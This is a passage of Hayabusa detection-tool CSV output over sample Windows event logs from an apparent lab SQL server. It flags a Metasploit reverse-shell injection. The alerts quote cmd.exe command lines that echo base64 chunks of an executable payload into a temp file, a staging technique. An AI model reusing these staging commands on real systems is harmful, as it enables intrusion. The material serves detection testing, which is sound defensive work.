C:\Windows\System32\cmd.exe | PID: 0xe74 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.510 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.510 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.513 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.790 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXF1ZXN0cyAgICAgTnVtYmVyIG9mIHJlcXVlc3RzIHRvIHBlcmZvcm0KAABPcHRpb25zIGFyZToKAAAAVXNhZ2U6ICVzIFtvcHRpb25zXSBbaHR0cDovL11ob3N0bmFtZVs6cG9ydF0vcGF0aAoAADolZABTU0wgbm90IGNvbXBpbGVkIGluOyBubyBodHRwcyBzdXBwb3J0CgAAaHR0cHM6Ly8AAAAAWyVzXQAAAABodHRwOi8vAGFiOiBDb3VsZCBub3QgcmVhZCBQT1NUIGRhdGEgZmlsZTogJXMKAABhYjogQ291bGQgbm90IGFsbG9jYXRlIFBPU1QgZGF0YSBidWZmZXIKAAAAAGFiOiBDb3VsZCBub3Qgc3RhdCBQT1NUIGRhdGEgZmlsZSAoJXMpOiAlcwoAYWI6IENvdWxkIG5vdCBvcGVuIFBPU1QgZGF0YSBmaWxlICglcyk6ICVzCgBhcHJfZ2xvYmFsX3Bvb2wAJWQuJWQlYwAqKioqAAAAACUzZCVjAAAAJTNkIAAAAAAgIC0gAAAAAEtNR1RQRQAAJXM6IGlsbGVnYWwgb3B0aW9uIC0tICVjCgAAACVzOiBvcHRpb24gcmVxdWlyZXMgYW4gYXJndW1lbnQgLS0gJWMKAABDb21tYW5kTGluZVRvQXJndlcAAGFwcl9pbml0aWFsaXplAAAwMTIzNDU2Nzg5LgAwLjAuMC4wAGJvZ3VzICVwAAAAAEk2NGQAAAAATm8gaG9zdCBkYXRhIG9mIHRoYXQgdHlwZSB3YXMgZm91bmQASG9zdCBub3QgZm91bmQAAEdyYWNlZnVsIHNodXRkb3duIGluIHByb2dyZXNzAAAAV1NBU3RhcnR1cCBub3QgeWV0IGNhbGxlZAAAAFdpbnNvY2sgdmVyc2lvbiBvdXQgb2YgcmFuZ2UAAAAATmV0d29yayBzeXN0ZW0gaXMgdW5hdmFpbGFibGUAAABUb28gbWFueSBsZXZlbHMgb2YgcmVtb3RlIGluIHBhdGgAAABTdGFsZSBORlMgZmlsZSBoYW5kbGUAAABEaXNjIHF1b3RhIGV4Y2VlZGVkAFRvbyBtYW55IHVzZXJzAABUb28gbWFueSBwcm9jZXNzZXMAAERpcmVjdG9yeSBub3QgZW1wdHkATm8gcm91dGUgdG8gaG9zdAAAAABIb3N0IGlzIGRvd24AAAAARmlsZSBuYW1lIHRvbyBsb25nAABUb28gbWFueSBsZXZlbHMgb2Ygc3ltYm9saWMgbGlua3MAAABDb25uZWN0aW9uIHJlZnVzZWQAAENvbm5lY3Rpb24gdGltZWQgb3V0AAAAAFRvbyBtYW55IHJlZmVyZW5jZXMsIGNhbid0IHNwbGljZQAAAENhbid0IHNlbmQgYWZ0ZXIgc29ja2V0IHNodXRkb3duAAAAAFNvY2tldCBpcyBub3QgY29ubmVjdGVk>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13c4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.790 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.790 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.792 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.064 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AFNvY2tldCBpcyBhbHJlYWR5IGNvbm5lY3RlZABObyBidWZmZXIgc3BhY2UgYXZhaWxhYmxlAAAAQ29ubmVjdGlvbiByZXNldCBieSBwZWVyAAAAAFNvZnR3YXJlIGNhdXNlZCBjb25uZWN0aW9uIGFib3J0AAAAAE5ldCBjb25uZWN0aW9uIHJlc2V0AAAAAE5ldHdvcmsgaXMgdW5yZWFjaGFibGUAAE5ldHdvcmsgaXMgZG93bgBDYW4ndCBhc3NpZ24gcmVxdWVzdGVkIGFkZHJlc3MAAEFkZHJlc3MgYWxyZWFkeSBpbiB1c2UAAEFkZHJlc3MgZmFtaWx5IG5vdCBzdXBwb3J0ZWQAAAAAUHJvdG9jb2wgZmFtaWx5IG5vdCBzdXBwb3J0ZWQAAABPcGVyYXRpb24gbm90IHN1cHBvcnRlZCBvbiBzb2NrZXQAAABTb2NrZXQgdHlwZSBub3Qgc3VwcG9ydGVkAAAAUHJvdG9jb2wgbm90IHN1cHBvcnRlZAAAQmFkIHByb3RvY29sIG9wdGlvbgBQcm90b2NvbCB3cm9uZyB0eXBlIGZvciBzb2NrZXQAAE1lc3NhZ2UgdG9vIGxvbmcAAAAARGVzdGluYXRpb24gYWRkcmVzcyByZXF1aXJlZAAAAABTb2NrZXQgb3BlcmF0aW9uIG9uIG5vbi1zb2NrZXQAAE9wZXJhdGlvbiBhbHJlYWR5IGluIHByb2dyZXNzAAAAT3BlcmF0aW9uIG5vdyBpbiBwcm9ncmVzcwAAAE9wZXJhdGlvbiB3b3VsZCBibG9jawAAAFRvbyBtYW55IG9wZW4gc29ja2V0cwAAAEludmFsaWQgYXJndW1lbnQAAAAAQmFkIGFkZHJlc3MAUGVybWlzc2lvbiBkZW5pZWQAAABCYWQgZmlsZSBudW1iZXIASW50ZXJydXB0ZWQgc3lzdGVtIGNhbGwAQVBSIGRvZXMgbm90IHVuZGVyc3RhbmQgdGhpcyBlcnJvciBjb2RlAEVycm9yIHN0cmluZyBub3Qgc3BlY2lmaWVkIHlldAAAcGFzc3dvcmRzIGRvIG5vdCBtYXRjaAAAVGhpcyBmdW5jdGlvbiBoYXMgbm90IGJlZW4gaW1wbGVtZW50ZWQgb24gdGhpcyBwbGF0Zm9ybQAAAAAAVGhlcmUgaXMgbm8gZXJyb3IsIHRoaXMgdmFsdWUgc2lnbmlmaWVzIGFuIGluaXRpYWxpemVkIGVycm9yIGNvZGUAAABTaGFyZWQgbWVtb3J5IGlzIGltcGxlbWVudGVkIHVzaW5nIGEga2V5IHN5c3RlbQBTaGFyZWQgbWVtb3J5IGlzIGltcGxlbWVudGVkIHVzaW5nIGZpbGVzAAAAAFNoYXJlZCBtZW1vcnkgaXMgaW1wbGVtZW50ZWQgYW5vbnltb3VzbHkAAAAAQ291bGQgbm90IGZpbmQgc3Bl>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9e8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.064 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.064 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.066 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.338 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Y2lmaWVkIHNvY2tldCBpbiBwb2xsIGxpc3QuAAAARW5kIG9mIGZpbGUgZm91bmQAAABNaXNzaW5nIHBhcmFtZXRlciBmb3IgdGhlIHNwZWNpZmllZCBjb21tYW5kIGxpbmUgb3B0aW9uAEJhZCBjaGFyYWN0ZXIgc3BlY2lmaWVkIG9uIGNvbW1hbmQgbGluZQBQYXJ0aWFsIHJlc3VsdHMgYXJlIHZhbGlkIGJ1dCBwcm9jZXNzaW5nIGlzIGluY29tcGxldGUAAFRoZSB0aW1lb3V0IHNwZWNpZmllZCBoYXMgZXhwaXJlZAAAAFRoZSBzcGVjaWZpZWQgY2hpbGQgcHJvY2VzcyBpcyBub3QgZG9uZSBleGVjdXRpbmcAAABUaGUgc3BlY2lmaWVkIGNoaWxkIHByb2Nlc3MgaXMgZG9uZSBleGVjdXRpbmcAAABUaGUgc3BlY2lmaWVkIHRocmVhZCBpcyBub3QgZGV0YWNoZWQAAAAAVGhlIHNwZWNpZmllZCB0aHJlYWQgaXMgZGV0YWNoZWQAAAAAAAAAAFlvdXIgY29kZSBqdXN0IGZvcmtlZCwgYW5kIHlvdSBhcmUgY3VycmVudGx5IGV4ZWN1dGluZyBpbiB0aGUgcGFyZW50IHByb2Nlc3MAAAAAWW91ciBjb2RlIGp1c3QgZm9ya2VkLCBhbmQgeW91IGFyZSBjdXJyZW50bHkgZXhlY3V0aW5nIGluIHRoZSBjaGlsZCBwcm9jZXNzAEludGVybmFsIGVycm9yAABUaGUgcHJvY2VzcyBpcyBub3QgcmVjb2duaXplZC4AAFRoZSBnaXZlbiBwYXRoIGNvbnRhaW5lZCB3aWxkY2FyZCBjaGFyYWN0ZXJzAAAAAFRoZSBnaXZlbiBwYXRoIGlzIG1pc2Zvcm1hdHRlZCBvciBjb250YWluZWQgaW52YWxpZCBjaGFyYWN0ZXJzAABUaGUgZ2l2ZW4gcGF0aCB3YXMgYWJvdmUgdGhlIHJvb3QgcGF0aAAAVGhlIGdpdmVuIHBhdGggaXMgaW5jb21wbGV0ZQAAAABUaGUgZ2l2ZW4gcGF0aCBpcyByZWxhdGl2ZQAAVGhlIGdpdmVuIHBhdGggaXMgYWJzb2x1dGUAAFRoZSBzcGVjaWZpZWQgbmV0d29yayBtYXNrIGlzIGludmFsaWQuAABUaGUgc3BlY2lmaWVkIElQIGFkZHJlc3MgaXMgaW52YWxpZC4AAAAARFNPIGxvYWQgZmFpbGVkAE5vIHNoYXJlZCBtZW1vcnkgaXMgY3VycmVudGx5IGF2YWlsYWJsZQBObyB0aHJlYWQga2V5IHN0cnVjdHVyZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAABObyB0aHJlYWQgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAAAABO>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x113c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.338 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.338 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.341 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.618 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo byBzb2NrZXQgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAAAABObyBwb2xsIHN0cnVjdHVyZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAAAAAE5vIGxvY2sgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAATm8gZGlyZWN0b3J5IHdhcyBwcm92aWRlZCBhbmQgb25lIHdhcyByZXF1aXJlZC4ATm8gdGltZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAABObyBwcm9jZXNzIHdhcyBwcm92aWRlZCBhbmQgb25lIHdhcyByZXF1aXJlZC4AAABBbiBpbnZhbGlkIHNvY2tldCB3YXMgcmV0dXJuZWQAAEFuIGludmFsaWQgZGF0ZSBoYXMgYmVlbiBwcm92aWRlZAAAAEEgbmV3IHBvb2wgY291bGQgbm90IGJlIGNyZWF0ZWQuAAAAAFVucmVjb2duaXplZCBXaW4zMiBlcnJvciBjb2RlICVkAAAAAFwAXAA/AFwAVQBOAEMAXAAAAAAAXABcAD8AXAAAAAAAQ2FuY2VsSW8AAAAAR2V0Q29tcHJlc3NlZEZpbGVTaXplQQAAR2V0Q29tcHJlc3NlZEZpbGVTaXplVwAAWndRdWVyeUluZm9ybWF0aW9uRmlsZQAAR2V0U2VjdXJpdHlJbmZvAEdldE5hbWVkU2VjdXJpdHlJbmZvQQAAAEdldE5hbWVkU2VjdXJpdHlJbmZvVwAAAFUATgBDAFwAAAAAAEdldEVmZmVjdGl2ZVJpZ2h0c0Zyb21BY2xXAAAAAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////bnRkbGwuZGxsAAAAc2hlbGwzMgB3czJfMzIAAG1zd3NvY2sAYWR2YXBpMzIAAAAAa2VybmVsMzIAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x568 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.618 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.618 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.620 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.896 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x12a4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.896 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.896 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.898 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.169 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa30 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.169 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.169 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.172 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.444 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 